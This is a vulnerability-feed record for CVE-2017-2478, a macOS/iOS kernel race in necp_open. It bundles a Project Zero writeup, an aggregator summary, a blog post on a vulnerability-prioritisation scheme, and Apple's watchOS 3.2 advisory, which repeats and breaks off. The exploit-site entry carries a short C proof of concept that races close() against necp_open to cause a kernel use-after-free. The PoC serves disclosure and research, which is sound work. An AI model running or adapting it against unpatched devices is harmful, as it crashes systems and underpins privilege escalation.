An issue was discovered in certain Apple products. Affected versions: iOS before 10.3, macOS before 10.12.4, tvOS before 10.2, and watchOS before 3.2. The issue involves the "Kernel" component. A race condition allows attackers to execute arbitrary code in a privileged context via a crafted app.
{"zdt": [{"lastseen": "2018-03-13T20:37:03", "description": "Exploit for multiple platform in category dos / poc", "cvss3": {}, "published": "2017-04-04T00:00:00", "type": "zdt", "title": "macOS / iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2478"], "modified": "2017-04-04T00:00:00", "id": "1337DAY-ID-27495", "href": "https://0day.today/exploit/description/27495", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1116\r\n \r\nnecp_open is a syscall used to obtain a new necp file descriptor\r\n \r\nThe necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap.\r\n \r\nHere's the relevant code from necp_open:\r\n \r\n error = falloc(p, &fp, &fd, vfs_context_current()); <--------------------- (a)\r\n if (error != 0) {\r\n goto done;\r\n }\r\n \r\n if ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP,\r\n M_WAITOK | M_ZERO)) == NULL) {\r\n error = ENOMEM;\r\n goto done;\r\n }\r\n \r\n fd_data->flags = uap->flags;\r\n LIST_INIT(&fd_data->clients);\r\n lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr);\r\n klist_init(&fd_data->si.si_note);\r\n fd_data->proc_pid = proc_pid(p);\r\n \r\n fp->f_fglob->fg_flag = FREAD;\r\n fp->f_fglob->fg_ops = &necp_fd_ops;\r\n fp->f_fglob->fg_data = fd_data; <-------------------------- (b)\r\n \r\n proc_fdlock(p);\r\n \r\n *fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE);\r\n procfdtbl_releasefd(p, fd, NULL);\r\n fp_drop(p, fd, fp, 1);\r\n proc_fdunlock(p); <--------------------- (c)\r\n \r\n *retval = fd;\r\n \r\n lck_rw_lock_exclusive(&necp_fd_lock); <---------------- (d)\r\n LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <------(e)\r\n lck_rw_done(&necp_fd_lock);\r\n \r\nat (a) a new file descriptor and file object is allocated for the calling process\r\nat (b) that new file's fg_data is set to the fd_data heap allocation\r\nat (c) the process fd table is 
unlocked meaning that other processes can now look up\r\n the new fd and get the associated fp\r\n \r\nat (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list\r\n \r\nThe bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c)\r\nanother thread can call close on the new fd which will free fd_data before we enqueue it at (e).\r\n \r\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2 \r\n \r\nin: \"...that other processes can now look up the new fd and get the associated fp...\" I meant threads, not processes!\r\n \r\n*/\r\n \r\n// ianbeer\r\n#if 0\r\nMacOS/iOS kernel uaf due to bad locking in necp_open\r\n \r\nnecp_open is a syscall used to obtain a new necp file descriptor\r\n \r\nThe necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap.\r\n \r\nHere's the relevant code from necp_open:\r\n \r\n error = falloc(p, &fp, &fd, vfs_context_current()); <--------------------- (a)\r\n if (error != 0) {\r\n goto done;\r\n }\r\n \r\n if ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP,\r\n M_WAITOK | M_ZERO)) == NULL) {\r\n error = ENOMEM;\r\n goto done;\r\n }\r\n \r\n fd_data->flags = uap->flags;\r\n LIST_INIT(&fd_data->clients);\r\n lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr);\r\n klist_init(&fd_data->si.si_note);\r\n fd_data->proc_pid = proc_pid(p);\r\n \r\n fp->f_fglob->fg_flag = FREAD;\r\n fp->f_fglob->fg_ops = &necp_fd_ops;\r\n fp->f_fglob->fg_data = fd_data; <-------------------------- (b)\r\n \r\n proc_fdlock(p);\r\n \r\n *fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE);\r\n procfdtbl_releasefd(p, fd, NULL);\r\n fp_drop(p, fd, fp, 1);\r\n proc_fdunlock(p); <--------------------- (c)\r\n \r\n *retval = fd;\r\n \r\n lck_rw_lock_exclusive(&necp_fd_lock); <---------------- (d)\r\n LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <------(e)\r\n lck_rw_done(&necp_fd_lock);\r\n \r\nat (a) a new file descriptor and file object is allocated for the calling 
process\r\nat (b) that new file's fg_data is set to the fd_data heap allocation\r\nat (c) the process fd table is unlocked meaning that other processes can now look up\r\n the new fd and get the associated fp\r\n \r\nat (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list\r\n \r\nThe bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c)\r\nanother thread can call close on the new fd which will free fd_data before we enqueue it at (e).\r\n \r\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2 \r\n#endif\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <pthread.h>\r\n \r\n#include <sys/syscall.h>\r\n \r\nint necp_open(int flags) {\r\n return syscall(SYS_necp_open, flags);\r\n}\r\n \r\nvoid* closer(void* arg) {\r\n while(1) {\r\n close(3);\r\n }\r\n}\r\n \r\nint main() {\r\n for (int i = 0; i < 10; i++) {\r\n pthread_t t;\r\n pthread_create(&t, NULL, closer, NULL);\r\n }\r\n \r\n while (1) {\r\n int fd = necp_open(0);\r\n close(fd);\r\n }\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-03-13] #", "sourceHref": "https://0day.today/exploit/27495", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:00:17", "description": "necp_open is a syscall used to obtain a new necp file descriptor\n\nThe necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap.\n\nHere's the relevant code from necp_open:\n\n`` error = falloc(p, &fp, &fd, vfs_context_current()); <\\--------------------- (a) if (error != 0) { goto done; }\n\nif ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP, M_WAITOK | M_ZERO)) == NULL) { error = ENOMEM; goto done; }\n\nfd_data->flags = uap->flags; LIST_INIT(&fd_data->clients); lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr); klist_init(&fd_data->si. 
si_note); fd_data->proc_pid = proc_pid(p);\n\nfp->f_fglob->fg_flag = FREAD; fp->f_fglob->fg_ops = &necp_fd_ops; fp->f_fglob->fg_data = fd_data; <\\-------------------------- (b)\n\nproc_fdlock(p);\n\n*fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE); procfdtbl_releasefd(p, fd, NULL); fp_drop(p, fd, fp, 1); proc_fdunlock(p); <\\--------------------- (c)\n\n*retval = fd;\n\nlck_rw_lock_exclusive(&necp_fd_lock); <\\---------------- (d) LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <\\------(e) lck_rw_done(&necp_fd_lock); ``\n\nat (a) a new file descriptor and file object is allocated for the calling process at (b) that the new file's fg_data is set to the fd_data heap allocation at (c) the process fd table is unlocked meaning that other processes can now look up the new fd and get the associated fp\n\nat (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list\n\nThe bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c) another thread can call close on the new fd which will free fd_data before we enqueue it at (e).\n\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2 \n\nAttachment: [necp_open. c](<https://bugs.chromium.org/p/project-zero/issues/attachment?aid=270104>)\n", "cvss3": {}, "published": "2017-04-04T00:00:00", "type": "seebug", "title": "MacOS/iOS kernel uaf due to bad locking in necp_open (CVE-2017-2478)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2478"], "modified": "2017-04-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92889", "id": "SSV:92889", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "avleonov": [{"lastseen": "2017-06-19T23:16:03", "description": "Hi everyone! Today I would like talk about software vulnerabilities. How to find really interesting vulnerabilities in the overall CVE flow. 
And how to do it automatically.\n\n\n\nFirst of all, let's talk why we may ever need to analyze software vulnerabilities? How people usually do their Vulnerability Management and Vulnerability Intelligence?\n\n\n\n * Some people have a Vulnerability scanner, scan infrastructure with it, patch founded vulnerabilities and think that this will be enough.\n * Some people pay attention to the vulnerabilities that are widely covered by media.\n * Some people use vulnerability databases and search for the most critical vulnerabilities by some criteria.\n\nEach of these ways have some advantages and some disadvantages.\n\n### Vulnerability Scanners\n\nHuge part of detection plugins were written manually. Especially plugins that work remotely without authorization. It takes time to make them and so they may appear in scanner with a huge latency. It also might be economically impractical for VM vendors to deal with vulnerabilities in some rare software.\n\n### Vulnerabilities, that are widely covered in media\n\nFrom the one hand it's really great. Even Top managers might ask you if we have, for example, GHOST in our infrastructure or other popular vulnerability. They begin to see that you are doing something important!\n\n\n\nOn the other hand, vulnerability researchers are also people. And they are interested in making more hype around the vulnerabilities they have discovered. It's just a part of their self-promotion. It's relatively easy to come with a name, register a domain and make a beautiful logo for the vulnerability. And it's hard to understand how critical this vulnerability really is. Especially when there are no so much details.\n\nHere you can see some well-known vulnerabilities that made a lot of noise in the past.\n\n\n\nMost of them were really critical. 
But, I have seen plenty of publications about BadLock saying that this vulnerability was overvalued.\n\n### Vulnerability databases and feeds\n\nMost people use CVSS vector and the CVSS Base Score for vulnerability filtering and vulnerability prioritization. They may also take into consideration the existence of exploits, for example. But the CVSS is still a basis.\n\nWhat is the Common Vulnerability Scoring System? In fact, there is a framework, a questionnaire, in which some person manually describes the vulnerability.\n\n\n\nI do not know who fills CVSS for National Vulnerability Database. But, imagine some people in US military uniform.\n\n\n\nThe final result is a score, number from 0 to 10, and a vector containing all the answers in a compact form.\n\nWhat's wrong with CVSS?\n\n * Filling the questionnaire is highly subjective procedure. You can easily make a mistake or just think differently during the classification.Or you may just have a controversial information about the vulnerability.\n * It takes time. That's why CVSS for the vulnerability appears in database much later than a human-readable description.\n * In NVD, for example, you can see only Base Score and Base Vector. And there is no Temporal Vector available.\n * CVSS model works well when we talk about desktops and servers and doesn't really fit for Internet of Things, for example.\n * CVSS is not well suited for confidentiality threats. A good example is the well-known Heartbleed.\n\nHeartbleed was rated as a medium-level vulnerability by NVD. But on the other hand, Tenable Network Security, the well-known Vulnerability Management vendor, believes that this vulnerability should have different CVSS vector.\n\n\n\nSo this is a controversial issue:\n\n * Confidentiality Impact is Complete or Partial?\n * Integrity Impact is None or Complete?\n\nAnd the final result depends on this.\n\nIt was the 2nd version of the CVSS standard, now the actual version is 3rd. 
But in 3rd versions problems with confidentiality threats were not solved either.\n\n### Vulnerability Quadrants\n\nSo, my idea was to evaluate vulnerabilities using the data that we currently have. Of course, it would be great to work with some highly formalized descriptions of vulnerabilities. However, as a rule, we do not have such information. We have only different objects linked with each other and stored in some vulnerability database.\n\nIf we open, for example, [Heartbleed page](<https://vulners.com/cve/CVE-2014-0160>) at [vulners.com](<https://vulners.com>) (read more about this service at \"[Vulners \u2013 Google for hacker](<https://avleonov.com/2016/07/23/vulners-google-for-hacker-how-the-best-vulnerability-search-engine-works-and-how-to-use-it/>)\") we can see all the objects linked to this vulnerability and the timestamps when objects were created.\n\n\n\nUsing this data I can calculate two integrated characteristics of vulnerability: \"Danger\" and \"Relevance\". And I can do it for any moment of time.\n\n**\"Danger\"** is about technical criticality and exploitability. It shows how interesting this vulnerability may be for an attacker.\n\nIt depends on:\n\n * CVSS Base Score \u2191\n * Potential exploitability \u2191\n * Exploits \u2191\n * Malware* \u2191\n * Patches \u2193\n * Detection plugins \u2193\n * Age \u2193\n\n**\"Relevance\"** shows the attention paid to the vulnerability by media, vulnerability management vendors, and users of vulnerability databases.\n\nIt depends on:\n\n * Media coverage \u2191\n * Descriptions \u2191\n * Detection plugins \u2191\n * Search queries* \u2191\n * Search results* \u2191 \n\n * Clicks* \u2191 \n\n * Age \u2193\n\n* haven't used it in PoC\n\nTo show the current state of vulnerability I use \"quadrants\". 
Like consulting and research companies do it for comparing software vendors.\n\n\n\n\n\nSo, for products \"Ability to execute\" and \"Completeness of vision\" are important, for vulnerabilities it will be \"Danger\" and \"Relevance\".\n\nI gave this names to quadrants:\n\n * Leading Threats\n * Local Disaster\n * Well-known Issue\n * Daily Routine\n\nHere is, for example, Vulnerability Quadrant for [Heartbleed](<https://vulners.com/cve/CVE-2014-0160>):\n\nAnd this one is for [Badlock](<https://vulners.com/cve/CVE-2016-2118>):\n\nAs you can see, unlike Heartbleed, Badlock was never a Leading Threat.\n\nWe can visualize more than one vulnerability at the same time. For example, here I took [last year CVEs](<https://vulners.com/search?query=type:cve%20last%20year>) and showed dynamics of their state since this beginning of the year (from 2017-01-01 till 2017-04-15).\n\nTo limit amount of the vulnerabilities in the lower left corner I made a \"rule for disappearing\": vulnerability may stay in Daily Routine quadrant only for 10 days with value of Danger and Relevance <3.5 or they will disappear.\n\nHere you can see different types of vulnerabilities. These ones are about [race condition that allows attackers to execute arbitrary code in a privileged context via a crafted app](<https://vulners.com/cve/CVE-2017-2478>). (iOS, macOS, tvOS, watchOS):\n\n\n\nAnd these vulnerabilities in Microsoft Edge and WordPress are also dangerous and exploitable, but never get the same level of media attention. Researchers find vulnerabilities in this products on a regular basis and therefore it's not a news. Vulnerabilities of such kind are slowly drifting from Local Disaster quadrant to Daily Routine.\n\n\n\nOf course, \"rule for disappearing\" doesn't work in real life and all vulnerabilities will exist in your infrastructure until you install the updates. 
If I switch off this rule and switch off all the captions, we will see something like this:\n\nSo, don't forget to fix vulnerabilities in your systems until it's too late:\n\n\n\nThe Greedy Raja covered with golden coins. From the classic Soviet animated film [Golden Antelope](<https://www.youtube.com/watch?v=wpSAJOyLfU8>)\n\nVulnerability Quadrant is a simple and universal way to show the current state for any vulnerability and dynamics of this state. it's possible to highlight most critical vulnerabilities and to identify trends. And it's just fun to watch vulnerabilities crawling on the screen. \n\nProblems and limitations \n- It\u2019s all about CVEs. And we all know, that some vulnerabilities may have multiple CVEs and some may don't have CVEs at all, for example vulnerabilities in SAP products. And they are out of scope right now. \n- Formulas for Danger and Relevance are very subjective. Basically, what factors you choose, such values you will get. However, when you use the same formulas for all vulnerabilities the overall picture remains the same. \n- We can make this instrument much more effective, but we need more information about exploits, malware, statistics and search history from vulnerability databases and so on.\n\n**Q:** Can we use Vulnerability Quadrants to decide which of vulnerabilities are really dangerous for your organization and should be discovered and patched immediately?\n\nWell, yes, but not in the form we have seen earlier. First of all, we should switch off gravity. Vulnerability Danger will not become smaller until you patch the software in your organization. As well as Relevance. 
And you should consider only vulnerabilities in the software products that are currently in use in your organization.\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T21:17:36", "title": "Vulnerability Quadrants", "type": "avleonov", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2118", "CVE-2014-0160", "CVE-2017-2478"], "modified": "2017-05-09T21:17:36", "id": "AVLEONOV:B5CA8049524C96A911991EE8ADF24F64", "href": "http://feedproxy.google.com/~r/avleonov/~3/nMNWzQgosww/", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "apple": [{"lastseen": "2021-11-10T17:00:50", "description": "# About the security content of watchOS 3.2\n\nThis document describes the security content of watchOS 3.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 3.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. 
This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform 
Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input 
validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: 
Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**libarchive**\n\nAvailable for: All Apple Watch models\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. 
This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: All Apple Watch models\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: All Apple Watch models\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. 
This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: April 04, 2017\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of watchOS 3.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", "CVE-2016-9643", "CVE-2017-2379", "CVE-2017-2390", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-5029"], "modified": "2017-03-27T00:00:00", "id": "APPLE:4D5D6CE943DE7279F91D23CD74879D4C", "href": "https://support.apple.com/kb/HT207602", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2020-12-24T20:41:17", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 3.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. 
